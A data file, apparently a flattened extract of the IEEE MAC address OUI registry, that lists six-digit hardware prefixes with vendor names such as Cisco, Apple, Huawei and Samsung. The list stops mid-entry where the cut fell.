B41513 HUAWEI TECHNOLOGIES CO.,LTD AC4E91 HUAWEI TECHNOLOGIES CO.,LTD 283152 HUAWEI TECHNOLOGIES CO.,LTD 001E10 HUAWEI TECHNOLOGIES CO.,LTD D47856 Avaya Inc A01290 Avaya Inc 38BB3C Avaya Inc F873A2 Avaya Inc CCF954 Avaya Inc 2CF4C5 Avaya Inc 3C3A73 Avaya Inc FC8399 Avaya Inc 009021 Cisco Systems, Inc 0090B1 Cisco Systems, Inc 0090BF Cisco Systems, Inc 00112F ASUSTek COMPUTER INC. 001BFC ASUSTek COMPUTER INC. 485B39 ASUSTek COMPUTER INC. BCAEC5 ASUSTek COMPUTER INC. 10BF48 ASUSTek COMPUTER INC. 6C9989 Cisco Systems, Inc 18E728 Cisco Systems, Inc 00100D Cisco Systems, Inc 001007 Cisco Systems, Inc 001014 Cisco Systems, Inc 00400B Cisco Systems, Inc 4C0082 Cisco Systems, Inc 7C95F3 Cisco Systems, Inc 34DBFD Cisco Systems, Inc 885A92 Cisco Systems, Inc 0050D1 Cisco Systems, Inc 0090D9 Cisco Systems, Inc 009092 Cisco Systems, Inc 00102F Cisco Systems, Inc 1CE6C7 Cisco Systems, Inc CCD539 Cisco Systems, Inc 006070 Cisco Systems, Inc 00E01E Cisco Systems, Inc 500604 Cisco Systems, Inc 046C9D Cisco Systems, Inc 84B261 Cisco Systems, Inc 001EE5 Cisco-Linksys, LLC 484487 Cisco SPVTG 38C85C Cisco SPVTG E448C7 Cisco SPVTG D0A5A6 Cisco Systems, Inc 3C5EC3 Cisco Systems, Inc 64F69D Cisco Systems, Inc 000389 PLANTRONICS, INC. A0554F Cisco Systems, Inc 204C9E Cisco Systems, Inc 84B802 Cisco Systems, Inc B0AA77 Cisco Systems, Inc BCC493 Cisco Systems, Inc A46C2A Cisco Systems, Inc 001217 Cisco-Linksys, LLC 001310 Cisco-Linksys, LLC D072DC Cisco Systems, Inc 28C7CE Cisco Systems, Inc F40F1B Cisco Systems, Inc F8C288 Cisco Systems, Inc 1C6A7A Cisco Systems, Inc 5067AE Cisco Systems, Inc F09E63 Cisco Systems, Inc 00101F Cisco Systems, Inc 54A274 Cisco Systems, Inc 80E01D Cisco Systems, Inc D8A25E Apple, Inc. 5855CA Apple, Inc. DC2B61 Apple, Inc. 40A6D9 Apple, Inc. 002312 Apple, Inc. 60FB42 Apple, Inc. 64B9E8 Apple, Inc. 000A27 Apple, Inc. 001D4F Apple, Inc. 403CFC Apple, Inc. 4860BC Apple, Inc. 3451C9 Apple, Inc. 406C8F Apple, Inc. D023DB Apple, Inc. 70DEE2 Apple, Inc. F0CBA1 Apple, Inc. 182032 Apple, Inc. 042665 Apple, Inc. EC3586 Apple, Inc. 54EAA8 Apple, Inc. 28E14C Apple, Inc. E4C63D Apple, Inc. 54E43A Apple, Inc. 04DB56 Apple, Inc. 60FACD Apple, Inc. 003EE1 Apple, Inc. FC253F Apple, Inc. 183451 Apple, Inc. 0C771A Apple, Inc. 286ABA Apple, Inc. 4CB199 Apple, Inc. ACFDEC Apple, Inc. DC9B9C Apple, Inc. 54724F Apple, Inc. 8C7C92 Apple, Inc. 04E536 Apple, Inc. A8BBCF Apple, Inc. AC7F3E Apple, Inc. 280B5C Apple, Inc. 14109F Apple, Inc. 04F7E4 Apple, Inc. 34C059 Apple, Inc. F0D1A9 Apple, Inc. AC3C0B Apple, Inc. 701124 Apple, Inc. C09F42 Apple, Inc. 705681 Apple, Inc. 040CCE Apple, Inc. 28F076 Apple, Inc. FCA386 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD D8CF9C Apple, Inc. 78FD94 Apple, Inc. 2CBE08 Apple, Inc. E8802E Apple, Inc. 006171 Apple, Inc. DC3714 Apple, Inc. 40331A Apple, Inc. CCC760 Apple, Inc. B03495 Apple, Inc. F437B7 Apple, Inc. 6C4008 Apple, Inc. 20A2E4 Apple, Inc. BC4CC4 Apple, Inc. 141357 ATP Electronics, Inc. D848EE Hangzhou Xueji Technology Co., Ltd. FCCF43 HUIZHOU CITY HUIYANG DISTRICT MEISIQI INDUSTRY DEVELOPMENT CO,.LTD 7C7176 Wuxi iData Technology Company Ltd. 7C0191 Apple, Inc. E435C8 HUAWEI TECHNOLOGIES CO.,LTD 0C54B9 Nokia B4EF04 DAIHAN Scientific Co., Ltd. A4DEC9 QLove Mobile Intelligence Information Technology (W.H.) Co. Ltd. CCE0C3 EXTEN Technologies, Inc. A8474A Hon Hai Precision Ind. Co.,Ltd. C40049 Kamama 646A74 AUTH-SERVERS, LLC 4C8ECC SILKAN SA B8B2EB Googol Technology (HK) Limited 908D78 D-Link International 84100D Motorola Mobility LLC, a Lenovo Company D00F6D T&W Electronics Company 98E848 Axiim 2C1BC8 Hunan Topview Network System CO.,LTD 80D605 Apple, Inc. A01E0B MINIX Technology Limited 68E8EB Linktel Technologies Co.,Ltd 089B4B iKuai Networks 4040A7 Sony Corporation C04A09 Zhejiang Everbright Communication Equip. Co,. Ltd AC6462 zte corporation 4473D6 Logitech 10CC1B Liverock technologies,INC E80734 Champion Optical Network Engineering, LLC 30F772 Hon Hai Precision Ind. Co.,Ltd. DC3CF6 Atomic Rules LLC 48137E Samsung Electronics Co.,Ltd C025A2 NEC Platforms, Ltd. A845CD Siselectron Technology LTD. 9C8DD3 Leonton Technologies A43831 RF elements s.r.o. 380546 Foctek Photonics, Inc. D0C193 SKYBELL, INC D48304 SHENZHEN FAST TECHNOLOGIES CO.,LTD DC2B2A Apple, Inc. E41A2C ZPE Systems, Inc. E8BDD1 HUAWEI TECHNOLOGIES CO.,LTD 6C7220 D-Link International 30A243 Shenzhen Prifox Innovation Technology Co., Ltd. F41535 SPON Communication Technology Co.,Ltd 380AAB Formlabs D445E8 Jiangxi Hongpai Technology Co., Ltd. 382DE8 Samsung Electronics Co.,Ltd C08997 Samsung Electronics Co.,Ltd A815D6 Shenzhen Meione Technology CO., LTD C07CD1 PEGATRON CORPORATION 90D8F3 zte corporation 04C23E HTC Corporation E01AEA Allied Telesis, Inc. 342606 CarePredict, Inc. 38B725 Wistron Infocomm (Zhongshan) Corporation ACEC80 ARRIS Group, Inc. FC335F Polyera 84D4C8 Widex A/S EC21E5 Toshiba F4C613 Alcatel-Lucent Shanghai Bell Co., Ltd 445F8C Intercel Group Limited B88981 Chengdu InnoThings Technology Co., Ltd. 28B9D9 Radisys Corporation AC676F Electrocompaniet A.S. 640DE6 Petra Systems E0553D Cisco Meraki F02624 WAFA TECHNOLOGIES CO., LTD. F8F464 Rawe Electonic GmbH 949F3E Sonos, Inc. 5C5188 Motorola Mobility LLC, a Lenovo Company EC0133 TRINUS SYSTEMS INC. 380195 Samsung Electronics Co.,Ltd 44975A SHENZHEN FAST TECHNOLOGIES CO.,LTD 5045F7 Liuhe Intelligence Technology Ltd. 0CE725 Microsoft Corporation 58F102 BLU Products Inc. 2CC548 IAdea Corporation DCA3AC RBcloudtech 3089D3 HONGKONG UCLOUDLINK NETWORK TECHNOLOGY LIMITED 1CADD1 Bosung Electronics Co., Ltd. 082CB0 Network Instruments E0DB10 Samsung Electronics Co.,Ltd 546172 ZODIAC AEROSPACE SAS EC60E0 AVI-ON LABS 5CB395 HUAWEI TECHNOLOGIES CO.,LTD 906CAC Fortinet, Inc. 3CA31A Oilfind International LLC E8F2E3 Starcor Beijing Co.,Limited 00FC8D Hitron Technologies. Inc DC15DB Ge Ruili Intelligent Technology ( Beijing ) Co., Ltd. A013CB Fiberhome Telecommunication Technologies Co.,LTD D00492 Fiberhome Telecommunication Technologies Co.,LTD 3CDA2A zte corporation 1432D1 Samsung Electronics Co.,Ltd 1816C9 Samsung Electronics Co.,Ltd 842E27 Samsung Electronics Co.,Ltd 14DDA9 ASUSTek COMPUTER INC. 184F32 Hon Hai Precision Ind. Co.,Ltd. 340A22 TOP-ACCESS ELECTRONICS CO LTD E866C4 Diamanti D4D7A9 Shanghai Kaixiang Info Tech LTD 84DF19 Chuango Security Technology Corporation 30F335 HUAWEI TECHNOLOGIES CO.,LTD 6C4418 Zappware 343D98 JinQianMao Technology Co.,Ltd. B46D35 Dalian Seasky Automation Co;Ltd A8D409 USA 111 Inc 6C4598 Antex Electronic Corp. 68A378 FREEBOX SAS 6459F8 Vodafone Omnitel B.V. F44713 Leading Public Performance Co., Ltd. 584704 Shenzhen Webridge Technology Co.,Ltd E4695A Dictum Health, Inc. 7C7A53 Phytrex Technology Corp. 107873 Shenzhen Jinkeyi Communication Co., Ltd. 48EE0C D-Link International D083D4 Xtel Wireless ApS 5CA178 TableTop Media (dba Ziosk) 9CBEE0 Biosoundlab Co., Ltd. 0C413E Microsoft Corporation 807459 K's Co.,Ltd. B87879 Roche Diagnostics GmbH D06F4A TOPWELL INTERNATIONAL HOLDINGS LIMITED 0492EE iway AG 601970 HUIZHOU QIAOXING ELECTRONICS TECHNOLOGY CO., LTD. A408EA Murata Manufacturing Co., Ltd. 70AD54 Malvern Instruments Ltd 9000DB Samsung Electronics Co.,Ltd B4EF39 Samsung Electronics Co.,Ltd F02A23 Creative Next Design 7C534A Metamako BCB308 HONGKONG RAGENTEK COMMUNICATION TECHNOLOGY CO.,LIMITED BC6E64 Sony Corporation 6C2E72 B&B EXPORTING LIMITED 5CCCFF Techroutes Network Pvt Ltd EC3C88 MCNEX Co.,Ltd. 08D34B Techman Electronics (Changshu) Co., Ltd. 78A351 SHENZHEN ZHIBOTONG ELECTRONICS CO.,LTD 90C35F Nanjing Jiahao Technology Co., Ltd. 148F21 Garmin International 9C685B Octonion SA FC3288 CELOT Wireless Co., Ltd D87495 zte corporation ECE2FD SKG Electric Group(Thailand) Co., Ltd. C808E9 LG Electronics 183A2D Samsung Electronics Co.,Ltd EC74BA Hirschmann Automation and Control GmbH 5C3B35 Gehirn Inc. E4FED9 EDMI Europe Ltd 5CF7C3 SYNTECH (HK) TECHNOLOGY LIMITED 74A063 HUAWEI TECHNOLOGIES CO.,LTD BCE767 Quanzhou TDX Electronics Co., Ltd 344CA4 amazipoint technology Ltd. A8F038 SHEN ZHEN SHI JIN HUA TAI ELECTRONICS CO.,LTD ACC73F VITSMO CO., LTD. 44356F Neterix Ltd 7076FF KERLINK 1436C6 Lenovo Mobile Communication Technology Ltd. 2C337A Hon Hai Precision Ind. Co.,Ltd. 84DDB7 Cilag GmbH International CCBDD3 Ultimaker B.V. 8CE78C DK Networks 545146 AMG Systems Ltd. 8463D6 Microsoft Corporation BC4DFB Hitron Technologies. Inc BC54F9 Drogoo Technology Co., Ltd. 78FC14 Family Zone Cyber Safety Ltd 3809A4 Firefly Integrations 08EFAB SAYME WIRELESS SENSOR NETWORK 382C4A ASUSTek COMPUTER INC. 9CE230 JULONG CO,.LTD. 5C41E7 Wiatec International Ltd. 74E277 Vizmonet Pte Ltd 14893E VIXTEL TECHNOLOGIES LIMTED FCAFAC Socionext Inc. 104E07 Shanghai Genvision Industries Co.,Ltd 88708C Lenovo Mobile Communication Technology Ltd. 3C1E13 HANGZHOU SUNRISE TECHNOLOGY CO., LTD 049B9C Eadingcore Intelligent Technology Co., Ltd. 842690 BEIJING THOUGHT SCIENCE CO.,LTD. 68F728 LCFC(HeFei) Electronics Technology co., ltd 307350 Inpeco SA DCEC06 Heimi Network Technology Co., Ltd. 801967 Shanghai Reallytek Information Technology Co.,Ltd 2CF7F1 Seeed Technology Inc. 0881BC HongKong Ipro Technology Co., Limited EC13B2 Netonix 5CAAFD Sonos, Inc. F03D29 Actility C09879 Acer Inc. 08115E Bitel Co., Ltd. D01242 BIOS Corporation 603696 The Sapling Company 54FFCF Mopria Alliance ACB74F METEL s.r.o. 5014B5 Richfit Information Technology Co., Ltd 3428F0 ATN International Limited CC10A3 Beijing Nan Bao Technology Co., Ltd. 14EDE4 Kaiam Corporation B84FD5 Microsoft Corporation D84A87 OI ELECTRIC CO.,LTD CC3F1D HMS Industrial Networks SLU DCDA4F GETCK TECHNOLOGY, INC 101218 Korins Inc. CCF538 3isysnetworks B8BD79 TrendPoint Systems 74F413 Maxwell Forest A00627 NEXPA System 303335 Boosty F4F26D TP-LINK TECHNOLOGIES CO.,LTD. BC9CC5 Beijing Huafei Technology Co., Ltd. 5CB8CB Allis Communications 34F0CA Shenzhen Linghangyuan Digital Technology Co.,Ltd. 44746C Sony Corporation 4C9EFF Zyxel Communications Corporation C456FE Lava International Ltd. C0EEFB OnePlus Tech (Shenzhen) Ltd 304225 BURG-WÄCHTER KG FCDBB3 Murata Manufacturing Co., Ltd. 404EEB Higher Way Electronic Co., Ltd. 506787 Planet Networks F4D261 SEMOCON Co., Ltd B009D3 Avizia 70720D Lenovo Mobile Communication Technology Ltd. 3CCD5A Technische Alternative GmbH 60C1CB Fujian Great Power PLC Equipment Co.,Ltd 6C2F2C Samsung Electronics Co.,Ltd 8CBF9D Shanghai Xinyou Information Technology Ltd. Co. 9CAD97 Hon Hai Precision Ind. Co.,Ltd. 882950 Netmoon Technology Co., Ltd 48D855 Telvent 08F728 GLOBO Multimedia Sp. z o.o. Sp.k. 206E9C Samsung Electronics Co.,Ltd BC25F0 3D Display Technologies Co., Ltd. C03D46 Shanghai Sango Network Technology Co.,Ltd 64EAC5 SiboTech Automation Co., Ltd. 7CE524 Quirky, Inc. 94D60E shenzhen yunmao information technologies co., ltd CCA0E5 DZG Metering GmbH 90AE1B TP-LINK TECHNOLOGIES CO.,LTD. 60E327 TP-LINK TECHNOLOGIES CO.,LTD. 60812B Astronics Custom Control Concepts F86601 Suzhou Chi-tek information technology Co., Ltd 145645 Savitech Corp. B025AA Private D4B43E Messcomp Datentechnik GmbH 48D18E Metis Communication Co.,Ltd 74DA38 Edimax Technology Co. Ltd. 30F7D7 Thread Technology Co., Ltd 18227E Samsung Electronics Co.,Ltd 30C7AE Samsung Electronics Co.,Ltd 1C1CFD Dalian Hi-Think Computer Technology, Corp 7062B8 D-Link International ACA919 TrekStor GmbH 44D4E0 Sony Corporation E4F4C6 NETGEAR C44E1F BlueN B0869E Chloride S.r.L D057A1 Werma Signaltechnik GmbH & Co. KG B4B542 Hubbell Power Systems, Inc. 54CDEE ShenZhen Apexis Electronic Co.,Ltd 909864 Impex-Sat GmbH&Co KG DCE578 Experimental Factory of Scientific Engineering and Special Design Department 38F098 Vapor Stone Rail Systems 64E892 Morio Denki Co., Ltd. E8FC60 ELCOM Innovations Private Limited 88E8F8 YONG TAI ELECTRONIC (DONGGUAN) LTD. 709383 Intelligent Optical Network High Tech CO.,LTD. 80D433 LzLabs GmbH 94C014 Sorter Sp. j. Konrad Grzeszczyk MichaA, Ziomek 9CFBF1 MESOMATIC GmbH & Co.KG 1027BE TVIP 2087AC AES motomation 9451BF Hyundai ESG F015A0 KyungDong One Co., Ltd. 1CAB01 Innovolt B0DA00 CERA ELECTRONIQUE D8B6D6 Blu Tether Limited C8D429 Muehlbauer AG 6C2C06 OOO NPP Systemotechnika-NN C4913A Shenzhen Sanland Electronic Co., ltd. 90DFB7 s.m.s smart microwave sensors GmbH 085700 TP-LINK TECHNOLOGIES CO.,LTD. F85C45 IC Nexus Co. Ltd. ACE069 ISAAC Instruments 30B5C2 TP-LINK TECHNOLOGIES CO.,LTD. E07F53 TECHBOARD SRL 48FEEA HOMA B.V. 8C41F2 RDA Technologies Ltd. E036E3 Stage One International Co., Ltd. 242642 SHARP Corporation. 34DE34 zte corporation FC1607 Taian Technology(Wuxi) Co.,Ltd. AC02CA HI Solutions, Inc. FCBBA1 Shenzhen Minicreate Technology Co.,Ltd F08A28 JIANGSU HENGSION ELECTRONIC S and T CO.,LTD 28BB59 RNET Technologies, Inc. E8EA6A StarTech.com 04DB8A Suntech International Ltd. 8C569D Imaging Solutions Group 40B6B1 SUNGSAM CO,.Ltd E86183 Black Diamond Advanced Technology, LLC D86595 Toy's Myth Inc. C0F79D Powercode C4C919 Energy Imports Ltd D8DD5F BALMUDA Inc. D86194 Objetivos y Sevicios de Valor Añadido 589CFC FreeBSD Foundation 702C1F Wisol 746F3D Contec GmbH 4C0DEE JABIL CIRCUIT (SHANGHAI) LTD. D0634D Meiko Maschinenbau GmbH & Co. KG D0BD01 DS International FC27A2 TRANS ELECTRIC CO., LTD. DC052F National Products Inc. 008B43 RFTECH 38C9A9 SMART High Reliability Solutions, Inc. 8CDE99 Comlab Inc. 4CE1BB Zhuhai HiFocus Technology Co., Ltd. 24A87D Panasonic Automotive Systems Asia Pacific(Thailand)Co.,Ltd. 501AC5 Microsoft B0989F LG CNS EC71DB Reolink Innovation Limited 889166 Viewcooper Corp. 103378 FLECTRON Co., LTD F0D3A7 CobaltRay Co., Ltd 38A53C COMECER Netherlands 84FE9E RTC Industries, Inc. FC4B1C INTERSENSOR S.R.L. 403067 Conlog (Pty) Ltd 085240 EbV Elektronikbau- und Vertriebs GmbH B8C1A2 Dragon Path Technologies Co., Limited 80F25E Kyynel A409CB Alfred Kaercher GmbH & Co KG 600347 Billion Electric Co. Ltd. F81CE5 Telefonbau Behnke GmbH 14EDA5 Wächter GmbH Sicherheitssysteme C0F1C4 Pacidal Corporation Ltd. 5CFFFF Shenzhen Kezhonglong Optoelectronic Technology Co., Ltd 68692E Zycoo Co.,Ltd D46867 Neoventus Design Group 2C18AE Trend Electronics Co., Ltd. B4750E Belkin International Inc. 94103E Belkin International Inc. 7CB733 ASKEY COMPUTER CORP 107BEF Zyxel Communications Corporation B462AD Elysia Germany GmbH 345C40 Cargt Holdings LLC 9C216A TP-LINK TECHNOLOGIES CO.,LTD. F862AA xn systems A4059E STA Infinity LLP 3051F8 BYK-Gardner GmbH 74A4B5 Powerleader Science and Technology Co. Ltd. 909F43 Accutron Instruments Inc. 2C7155 HiveMotion 44EE30 Budelmann Elektronik GmbH FC1E16 IPEVO corp 68193F Digital Airways E8F226 MILLSON CUSTOM SOLUTIONS INC. 3C6E63 Mitron OY A4E9A3 Honest Technology Co., Ltd A0E5E9 enimai Inc 50C006 Carmanah Signs 04CB1D Traka plc 2464EF CYG SUNRI CO.,LTD. D8270C MaxTronic International Co., Ltd. B4CCE9 PROSYST A0BF50 S.C. ADD-PRODUCTION S.R.L. E8D4E0 Beijing BenyWave Technology Co., Ltd. 20180E Shenzhen Sunchip Technology Co., Ltd 80B219 ELEKTRON TECHNOLOGY UK LIMITED 2894AF Samhwa Telecom AC5036 Pi-Coral Inc C4D655 Tercel technology co.,ltd 58BDF9 Sigrand C0C687 Cisco SPVTG 007DFA Volkswagen Group of America C49380 Speedytel technology 88354C Transics E0AEB2 Bender GmbH & Co.KG F84A7F Innometriks Inc 0C9B13 Shanghai Magic Mobile Telecommunication Co.Ltd. FC019E VIEVU 642184 Nippon Denki Kagaku Co.,LTD CC4AE1 fourtec -Fourier Technologies 8C4B59 3D Imaging & Simulations Corp 5C3327 Spazio Italia srl E0A198 NOJA Power Switchgear Pty Ltd 507691 Tekpea, Inc. 28F532 ADD-Engineering BV 9440A2 Anywave Communication Technologies, Inc. 384233 Wildeboer Bauteile GmbH C034B4 Gigastone Corporation 94BF1E eflow Inc. / Smart Device Planning and Development Division E8516E TSMART Inc. AC220B ASUSTek COMPUTER INC. B887A8 Step Ahead Innovations Inc. CCE8AC SOYEA Technology Co.,Ltd. 303EAD Sonavox Canada Inc F835DD Gemtek Technology Co., Ltd. 1C86AD MCT CO., LTD. 28D93E Telecor Inc. 640B4A Digital Telecom Technology Limited D8B04C Jinan USR IOT Technology Co., Ltd. E8519D Yeonhab Precision Co.,LTD CC04B4 Select Comfort 5C15E1 AIDC TECHNOLOGY (S) PTE LTD E067B3 Shenzhen C-Data Technology Co., Ltd 70F176 Data Modul AG B8CD93 Penetek, Inc B847C6 SanJet Technology Corp. E4776B AARTESYS AG 30F31D zte corporation A0EC80 zte corporation 28DB81 Shanghai Guao Electronic Technology Co., Ltd 3806B4 A.D.C. GmbH B8241A SWEDA INFORMATICA LTDA A0B100 ShenZhen Cando Electronics Co.,Ltd 201D03 Elatec GmbH D866C6 Shenzhen Daystar Technology Co.,ltd D00EA4 Porsche Cars North America 188857 Beijing Jinhong Xi-Dian Information Technology Corp. B8C855 Shanghai GBCOM Communication Technology Co.,Ltd. 78303B Stephen Technologies Co.,Limited 40BC73 Cronoplast S.L. 1C4AF7 AMON INC 0CC81F Summer Infant, Inc. A8FB70 WiseSec L.t.d E481B3 Shenzhen ACT Industrial Co.,Ltd. 1C76CA Terasic Technologies Inc. 888964 GSI Electronics Inc. 0C1105 AKUVOX (XIAMEN) NETWORKS CO., LTD 5C22C4 DAE EUN ELETRONICS CO., LTD DC5726 Power-One F8DADF EcoTech, Inc. 30AE7B Deqing Dusun Electron CO., LTD 68EC62 YODO Technology Corp. Ltd. 84E4D9 Shenzhen NEED technology Ltd. 784B08 f.robotics acquisitions ltd B0808C Laser Light Engines A4D3B5 GLITEL Stropkov, s.r.o. 6C8B2F zte corporation CC1AFA zte corporation 8C5AF0 Exeltech Solar Products 4007C0 Railtec Systems GmbH D8DCE9 Kunshan Erlab ductless filtration system Co.,Ltd DCD52A Sunny Heart Limited C06C6D MagneMotion, Inc. E880D8 GNTEK Electronics Co.,Ltd. F499AC WEBER Schraubautomaten GmbH D43A65 IGRS Engineering Lab Ltd. 7CD844 Enmotus Inc 44619C FONsystem co. ltd. 70820E as electronics GmbH B4FE8C Centro Sicurezza Italia SpA 2CF203 EMKO ELEKTRONIK SAN VE TIC AS D82916 Ascent Communication Technology A073FC Rancore Technologies Private Limited 88685C Shenzhen ChuangDao & Perpetual Eternal Technology Co.,Ltd 102831 Morion Inc. 78A106 TP-LINK TECHNOLOGIES CO.,LTD. D05099 ASRock Incorporation A49EDB AutoCrib, Inc. 1C37BF Cloudium Systems Ltd. CC0DEC Cisco SPVTG 40E730 DEY Storage Systems, Inc. 68B094 INESA ELECTRON CO.,LTD 6C6126 Rinicom Holdings F8FEA8 Technico Japan Corporation 1800DB Fitbit Inc. 44F849 Union Pacific Railroad 50ABBF Hoseo Telecom 9CE635 Nintendo Co., Ltd. 60A44C ASUSTek COMPUTER INC. 0C722C TP-LINK TECHNOLOGIES CO.,LTD. F02329 SHOWA DENKI CO.,LTD. 5461EA Zaplox AB D08B7E Passif Semiconductor 04586F Sichuan Whayer information industry Co.,LTD 2C7B5A Milper Ltd 185AE8 Zenotech.Co.,Ltd C47DCC Zebra Technologies Inc E0AEED LOENK 3C6FF7 EnTek Systems, Inc. 48BE2D Symanitron D4BF2D SE Controls Asia Pacific Ltd E492E7 Gridlink Tech. Co.,Ltd. CC047C G-WAY Microwave 64535D Frauscher Sensortechnik 645A04 Chicony Electronics Co., Ltd. AC1702 Fibar Group sp. z o.o. 984CD3 Mantis Deposition 08606E ASUSTek COMPUTER INC. 3C57D5 FiveCo E0D9A2 Hippih aps FC0647 Cortland Research, LLC FC9FAE Fidus Systems Inc 98208E Definium Technologies 704AE4 Rinstrum Pty Ltd 083AB8 Shinoda Plasma Co., Ltd. A0DD97 PolarLink Technologies, Ltd 7076DD OxyGuard Internation A/S E89AFF Fujian LANDI Commercial Equipment Co.,Ltd EC89F5 Lenovo Mobile Communication Technology Ltd. B49842 zte corporation 7054D2 PEGATRON CORPORATION 681E8B InfoSight Corporation F8D7BF REV Ritter GmbH D052A8 Physical Graph Corporation CC3A61 SAMSUNG ELECTRO MECHANICS CO., LTD. F84897 Hitachi, Ltd. F80BD0 Datang Telecom communication terminal (Tianjin) Co., Ltd. 6CD146 FRAMOS GmbH F073AE PEAK-System Technik 48B8DE HOMEWINS TECHNOLOGY CO.,LTD. 10EA59 Cisco SPVTG 0C191F Inform Electronik 1065CF IQSIM 684CA8 Shenzhen Herotel Tech. Co., Ltd. 0C8CDC Suunto Oy D4136F Asia Pacific Brands 84E714 Liang Herng Enterprise,Co.Ltd. 18D949 Qvis Labs, LLC 646223 Cellient Co., Ltd. 98473C SHANGHAI SUNMON COMMUNICATION TECHNOGY CO.,LTD 5481AD Eagle Research Corporation 00B56D David Electronics Co., LTD. 2C3557 ELIIY Power CO., Ltd. B80415 Bayan Audio F4472A Nanjing Rousing Sci. and Tech. Industrial Co., Ltd DC028E zte corporation E4A7FD Cellco Partnership 2CE2A8 DeviceDesign 60C5A8 Beijing LT Honway Technology Co.,Ltd B4DF3B Chromlech 7C9A9B VSE valencia smart energy A845E9 Firich Enterprises CO., LTD. EC473C Redwire, LLC 3CC12C AES Corporation 949BFD Trans New Technology, Inc. B829F7 Blaster Tech C8E1A7 Vertu Corporation Limited 4CAB33 KST technology 485261 SOREEL 24694A Jasmine Systems Inc. D808F5 Arcadia Networks Co. Ltd. 0CC47E EUCAST Co., Ltd. 50724D BEG Brueck Electronic GmbH 783CE3 Kai-EE B898B0 Atlona Inc. 080C0B SysMik GmbH Dresden 54A04F t-mac Technologies Ltd 14DB85 S NET MEDIA B8DAF1 Strahlenschutz- Entwicklungs- und Ausruestungsgesellschaft mbH D45C70 Wi-Fi Alliance F41E26 Simon-Kaloi Engineering 7CB232 Hui Zhou Gaoshengda Technology Co.,LTD A00ABF Wieson Technologies Co., Ltd. 8CCDE8 Nintendo Co., Ltd. 00E666 ARIMA Communications Corp. 34BDFA Cisco SPVTG DCBF90 HUIZHOU QIAOXING TELECOMMUNICATION INDUSTRY CO.,LTD. C8FB26 Cisco SPVTG ACBD0B Leimac Ltd. B85810 NUMERA, INC. 049F06 Smobile Co., Ltd. 289A4B SteelSeries ApS ECD950 IRT SA 702526 Nokia A08C15 Gerhard D. Wempe KG 90CF6F Dlogixs Co Ltd A4D18F Shenzhen Skyee Optical Fiber Communication Technology Ltd. 58343B Glovast Technology Ltd. 109FA9 Actiontec Electronics, Inc C0A364 3D Systems Massachusetts AC7A42 iConnectivity 700BC0 Dewav Technology Company F8051C DRS Imaging and Targeting Solutions 78D34F Pace-O-Matic, Inc. A4466B EOC Technology 7C386C Real Time Logic 2067B1 Pluto inc. 189A67 CSE-Servelec Limited 087D21 Altasec technology corporation 901EDD GREAT COMPUTER CORPORATION B8B94E Shenzhen iBaby Labs, Inc. ACC698 Kohzu Precision Co., Ltd. 34D7B4 Tributary Systems, Inc. F40F9B WAVELINK 7C02BC Hansung Electronics Co. LTD B82410 Magneti Marelli Slovakia s.r.o. 105F49 Cisco SPVTG CC14A6 Yichun MyEnergy Domain, Inc 889676 TTC MARCONI s.r.o. 5C1737 I-View Now, LLC. AC0A61 Labor S.r.L. 241064 Shenzhen Ecsino Tecnical Co. Ltd 7CEBEA ASCT 1C5C60 Shenzhen Belzon Technology Co.,LTD. 645FFF Nicolet Neuro 9C0DAC Tymphany HK Limited 1C43EC JAPAN CIRCUIT CO.,LTD 1C5FFF Beijing Ereneben Information Technology Co.,Ltd Shenzhen Branch 6045BD Microsoft 9C54CA Zhengzhou VCOM Science and Technology Co.,Ltd 00BF15 Genetec Inc. 702F4B Steelcase Inc. 746A89 Rezolt Corporation 741489 SRT Wireless 241B13 Shanghai Nutshell Electronic Co., Ltd. B43564 Fujian Tian Cheng Electron Science & Technical Development Co.,Ltd. 54D1B0 Universal Laser Systems, Inc 785262 Shenzhen Hojy Software Co., Ltd. D4DF57 Alpinion Medical Systems 5048EB BEIJING HAIHEJINSHENG NETWORK TECHNOLOGY CO. LTD. B40E96 HERAN 28F606 Syes srl 20014F Linea Research Ltd EC0ED6 ITECH INSTRUMENTS SAS 38EE9D Anedo Ltd. 240917 Devlin Electronics Limited 78BEBD STULZ GmbH 40704A Power Idea Technology Limited 545EBD NL Technologies CC187B Manzanita Systems, Inc. 241125 Hutek Co., Ltd. B431B8 Aviwest 508C77 DIRMEIER Schanktechnik GmbH &Co KG 70B599 Embedded Technologies s.r.o. EC4C4D ZAO NPK RoTeK B058C4 Broadcast Microwave Services, Inc 84AF1F Beat System Service Co,. Ltd. A007B6 Advanced Technical Support, Inc. 0CD2B5 Binatone Telecommunication Pvt. Ltd 4846F1 Uros Oy B827EB Raspberry Pi Foundation 08BE09 Astrol Electronic AG B41DEF Internet Laboratories, Inc. 809393 Xapt GmbH 6044F5 Easy Digital Ltd. 2817CE Omnisense Ltd 3CCE73 Cisco Systems, Inc B0BD6D Echostreams Innovative Solutions F47F35 Cisco Systems, Inc BCC168 DinBox Sverige AB DC309C Heyrex Limited F89955 Fortress Technology Inc 4CC94F Nokia 0CE5D3 DH electronics GmbH 7CEF8A Inhon International Ltd. 0CAF5A GENUS POWER INFRASTRUCTURES LIMITED E425E9 Color-Chip 745798 TRUMPF Laser GmbH + Co. KG 14B1C8 InfiniWing, Inc. B48255 Research Products Corporation 8016B7 Brunel University 50053D CyWee Group Ltd F88C1C KAISHUN ELECTRONIC TECHNOLOGY CO., LTD. BEIJING 1C0B52 EPICOM S.A 747E2D Beijing Thomson CITIC Digital Technology Co. LTD. 4C64D9 Guangdong Leawin Group Co., Ltd 940149 AutoHotBox 1CB094 HTC Corporation 18193F Tamtron Oy 885C47 Alcatel Lucent 3CC1F6 Melange Systems Pvt. Ltd. 94FAE8 Shenzhen Eycom Technology Co., Ltd E840F2 PEGATRON CORPORATION 645EBE Yahoo! JAPAN CCC50A SHENZHEN DAJIAHAO TECHNOLOGY CO.,LTD D8BF4C Victory Concept Electronics Limited 3CB9A6 Belden Deutschland GmbH C49805 Minieum Networks, Inc 90F4C1 Rand McNally 008DDA Link One Co., Ltd. 78A183 Advidia 9C0111 Shenzhen Newabel Electronic Co., Ltd. 400E67 Tremol Ltd. C0DF77 Conrad Electronic SE 3055ED Trex Network LLC F0F755 Cisco Systems, Inc 1CB243 TDC A/S 38BF33 NEC CASIO Mobile Communications 8C0CA3 Amper 94DF58 IJ Electron CO.,Ltd. 48D54C Jeda Networks 1CBBA8 OJSC "Ufimskiy Zavod "Promsvyaz" BCB852 Cybera, Inc. C49300 8Devices 6CA682 EDAM information & communications 28D576 Premier Wireless, Inc. 70D6B6 Metrum Technologies C0A0DE 